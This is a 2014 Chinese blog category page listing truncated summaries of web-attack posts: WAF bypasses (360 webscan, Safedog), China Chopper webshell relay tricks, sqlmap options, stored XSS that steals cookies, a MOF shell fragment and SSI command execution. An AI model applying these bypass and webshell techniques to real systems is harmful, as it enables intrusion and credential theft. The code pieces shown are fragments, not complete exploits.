随笔分类 -  web

web安全
摘要:先简单说一下php调用mail()函数的过程。 看到源码ext/mail.c236行:char *sendmail_path = INI_STR("sendmail_path");char *sendmail_cmd = NULL;从INI中获得sendmail_path变量。我们看看php.ini... 阅读全文
posted @ 2014-11-18 19:46 Hookjoy 阅读(906) 评论(0) 推荐(0)
摘要:这两天给360做了一个webscan360的总结,结果补丁还没有出来,就被人公布到了91org上面,既然公开了,那我就做一个总结首先我们贴上它最新的防御正则\||\b(alert\(|confirm\(|expression\(|prompt\(|benchmark\s*?\(.*\)|sleep\... 阅读全文
posted @ 2014-11-11 15:07 Hookjoy 阅读(1349) 评论(0) 推荐(0)
摘要:出处: 九零SEC连接:http://forum.90sec.org/forum.php?mod=viewthread&tid=8059----------------------------------------------------------team:xdsec&90secauthor:w... 阅读全文
posted @ 2014-11-09 22:49 Hookjoy 阅读(12716) 评论(0) 推荐(1)
摘要:原文:http://masatokinugawa.l0.cm/2014/11/ie-printpreview-infoleak.html 问题1:在IE9和以前的版本当中进行打印预览操作时,IE会取出原始页面的URL并将URL放到重新生成的html中的base标签的href属性里。由于此处并没有对U... 阅读全文
posted @ 2014-11-02 19:00 Hookjoy 阅读(357) 评论(0) 推荐(0)
摘要:http://www.wooyun.org/bugs/wooyun-2010-061859 阅读全文
posted @ 2014-11-02 05:07 Hookjoy 阅读(324) 评论(0) 推荐(0)
摘要:-r "抓的包存放的文件路径.txt" 一般方便带cookie与session类型--dbms Oracle/Mysql 指定数据库类型指定变量注入点变量:在变量值(value)后面加*--level 3 [1-5]--risk 1 [1-3]===========决定探测深度(尝试的数量... 阅读全文
posted @ 2014-10-30 15:45 Hookjoy 阅读(1449) 评论(0) 推荐(0)
摘要:Author:SunshieQQ:1141056911Blog:http://phpinfo.me需要准备的东西:**************************************原版菜刀一个PHP+Apache运行环境过狗一句话一个如;或者************************... 阅读全文
posted @ 2014-10-28 09:47 Hookjoy 阅读(1714) 评论(0) 推荐(0)
摘要:看到很多朋友看了我的PHP中转脚本http://phpinfo.me/2014/02/01/309.html,问我那个脚本只能中转PHP的,但是asp的呢asp连接的时候安全狗拦截的正是菜刀POST里的eval("Ex"%26cHr(101)%26"cute关键字,那么只需替换下,替换成eval("... 阅读全文
posted @ 2014-10-28 09:41 Hookjoy 阅读(2697) 评论(0) 推荐(0)
只有注册用户登录后才能阅读该文。
posted @ 2014-10-27 16:39 Hookjoy 阅读(3) 评论(0) 推荐(0)
摘要:测试时间:2014.10.21测试版本:IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512(2014-05-29),均为今天能下到的最新版。用于绕过的核心字符:%0A,某些特殊场合需要和注释符配合使用。测试详细步骤常规注入测试:http://192.168.91... 阅读全文
posted @ 2014-10-22 14:30 Hookjoy 阅读(487) 评论(0) 推荐(0)
摘要:(1):Coremail邮件系统存储型XSS之一给受害者发送主题如下的邮件:当受害者试图打开邮件时,cookie将会被窃取:(2):Coremail邮件系统存储型XSS之二将特制的swf文件作为附件发送给受害者(这里可以选择在过节的时候下手,比如将文件名改称新年贺卡.swf):swf文件的AS代码如... 阅读全文
posted @ 2014-10-21 09:42 Hookjoy 阅读(937) 评论(0) 推荐(0)
摘要:在乌云上看到的目标为YY钓鱼地址是:http://226729.137167.20la.com.cn/判断数据库连接地址为http://226729.137167.20la.com.cn/config.asp然后用IIS7解析漏洞http://226729.137167.20la.com.cn/co... 阅读全文
posted @ 2014-10-20 08:14 Hookjoy 阅读(210) 评论(0) 推荐(0)
摘要:原文标题为:第三方接口 #黑客怎么爱你都不嫌多#作者 小飞#fei@90sec.org#前段时间太忙! 现在终于有时间回土司看看了!#原文地址:https://www.t00ls.net/thread-27765-1-1.html0x01 写在前面本文总结了最近爆出的第三方插件高危漏洞,因本文实例... 阅读全文
posted @ 2014-08-29 08:23 Hookjoy 阅读(1897) 评论(0) 推荐(5)
摘要:脚本参考了 LCX Gavin2位前辈的帖子.在此表示非常的感谢. https://www.t00ls.net/thread-26740-1-1.html https://www.t00ls.net/thread-26791-1-1.html说明:脚本支持PDO和MYSQL 2种方式... 阅读全文
posted @ 2014-06-22 00:35 Hookjoy 阅读(1710) 评论(0) 推荐(0)
摘要:Win MOF ShellHost:User:Pass:DB: '.mysql_error().'');echo "";echo "Cmd:";echo "";echo "";echo "";echo "";echo "";echo "";echo "";echo "";echo "";if ... 阅读全文
posted @ 2014-04-14 20:19 Hookjoy 阅读(446) 评论(0) 推荐(0)
摘要:Err ThenIsObjInstalled = TrueElseIsObjInstalled = FalseEnd ifSet xTestObj = NothingErr = 0End Function%>支持组件:" & theComponent(i) & "√" & vbCrLfElseResponse.Write "" & theComponent(i) & "×" & vbCrLfEnd ifNext%> " & Err.Des 阅读全文
posted @ 2014-04-12 12:50 Hookjoy 阅读(1264) 评论(0) 推荐(0)
摘要:shtml用的是SSI指令,SSI指令虽然不多 但是功能相对而言还是很强大的,在PHP禁止了命令执行函数和开了安全模式的时候可以试试看也可以在服务器允许上传shtml后缀脚本的时候试试PS:只有服务器配置了允许执行SHTML才行 对于SSI 百度百科给出的解释是:SSI是为WEB服务器提供的一套命令,这些命令只要直接嵌入到HTML文档的注释内容之中即可。如: 就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内容。他的指令我就不一样列举了 提几个有用的 //可以用来读文件 //可 阅读全文
posted @ 2014-04-07 21:45 Hookjoy 阅读(509) 评论(0) 推荐(0)
摘要:./download.php...if($link){ //加密后ID$link = base64_decode(urldecode($link));$link_array = explode(',', $link); if(is_array($link_array) && count($link_array)>0){$url = $link_array[0]; $contentid = $link_array[1];}}else{ //实现地址$contentid = $_GET['contentid'] ? $_GET['con 阅读全文
posted @ 2014-04-05 12:35 Hookjoy 阅读(290) 评论(0) 推荐(0)
摘要:前些天临时写的一脚本级反向代理程序,用法很简单,设置好目标站地址,然后放到你网站根目录:index.asp,再将404页面自定义为:index.asp,即可。由于暂时没有 url 替换需要,所以没有写 url 替换规则,如果你有需要的话,可以在末尾写个函数替换 http.ResponseBody 中的内容。 0 Then '提取参数 url = Mid(Request.QueryString, Len("404;http://" & Request.ServerVariables("HTTP_HOST") & ":&qu 阅读全文
posted @ 2014-03-30 22:39 Hookjoy 阅读(1147) 评论(0) 推荐(0)
摘要:1.1 bypass Char 通常有安全意识的程序员往往会对输入进行一定的过滤,比较常见的是针对某一关键符号进行过滤,比如“”,这种方式很多时候是无法防止攻击的,更安全的方式是通过编程语言提供的函数在输出的时候进行过滤。本节主要针对单字符过滤进行研究,分为引号、尖括号、括号这三个符号进行研究。1.1.1 引号在跨站测试中很多的vector(即攻击向量)本身是不包含引号的,例如下面的一些vector。但是在利用中经常需要使用引号,如果对引号进行了过滤,可以采取如下措施进行绕过。vector: 在chrome中,可能会导致浏览器崩溃,可以改用以下代码。4) magic_quotes_gpcPHP 阅读全文
posted @ 2014-03-23 21:24 Hookjoy 阅读(920) 评论(0) 推荐(0)